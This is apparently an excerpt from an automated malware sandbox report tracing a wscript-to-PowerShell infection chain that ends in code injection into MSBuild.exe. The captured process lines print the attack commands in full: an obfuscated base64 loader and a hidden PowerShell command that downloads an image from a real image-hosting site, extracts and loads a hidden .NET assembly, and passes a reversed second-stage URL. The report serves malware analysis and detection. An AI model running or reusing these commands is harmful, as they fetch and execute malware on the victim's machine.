                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep count: 4926 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfF
                      Source: wscript.exe, 00000000.00000002.2046656305.000002B95705D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2041706715.000002B95705D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000000.00000002.2046656305.000002B957010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: MSBuild.exe, 00000007.00000002.3350093200.00000000064E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                      Source: Yara matchFile source: amsi64_1472.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 360, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1472, type: MEMORYSTR
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 101F008Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
